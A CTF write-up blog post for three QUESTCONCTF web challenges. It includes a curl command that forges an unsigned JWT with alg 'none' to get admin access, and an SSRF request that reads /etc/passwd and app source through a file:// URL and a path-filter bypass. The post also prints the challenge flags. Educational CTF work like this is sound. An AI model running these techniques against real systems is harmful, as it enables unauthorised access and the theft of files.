root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF: QUESTCONCTF

Challenges:

Web
- Direction
- Theadmin
- Temp

WEB:

Direction:

I loaded the site and got this

I decided to check for the common file robots.txt that we all try to find and got a disallowed page.

I proceeded with curl and noticed an header containing a portion of the flag and automatically redirects to the next page.At first,I couldn’t use GET for it.I used header OPTIONS to find allowed http headers.

Flag portion 1 is shown below and the next flag stop will be the path in the Location header.

I wrote a script to automate it.

Flag-: QUESTCON{mi3d1r3ct10n_15_4n_4r}

Challenge 2: The Admin

The index page contains the documentation for the api.Route auth takes in a username and returns a jwt token created with the username and route access takes in the cookie and displays the username.

I was able to get the flag by setting the alg key to none.

curl https://questcon-theadmin.chals.io/access -H "Authorization: Bearer $(echo '{"alg":"none","typ":"JWT"}' | base64).eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzI5ODYwNTM2fQ"
{"flag":"QUESTCON{J3T_4lg0r1thm_15_vuln3r4bl3_70_n0n3}"}%

Flag-:QUESTCON{J3T_4lg0r1thm_15_vuln3r4bl3_70_n0n3}

Challenge 3: TEMP

I checked the source code aand noticed a POST request made to route /api which loads a url.

fetch('/api', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({ url: urlInput }),
            })

I made an http request to google and it worked.

❯ curl https://questcon-temp.chals.io/api -H "Content-Type: application/json" -d '{"url": "https://www.google.com"}'
{"data":"<!doctype html><html itemscope=\"\" itemtype=\"http://schema.org/WebPage\" lang=\"en\"><head><meta content=\"Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.\" name=\"description\"><meta content=\"noodp, \" name=\"robots\"><meta content=\"text/html; charset=UTF-8\"

I tried to read /etc/passwd with file:// schema which did not work because it was filtered.Then, I tred /etc/./passwd which worked.

I got the flag by reading the source code stored in /app/app.py.I got this idea because most ctf challenges are stored in /app/app.py.

Flag-: QUESTCON{r3c0ver_d3l3t3d_fil3}

THANKS FOR READING

REFERENCES:

Direction’s script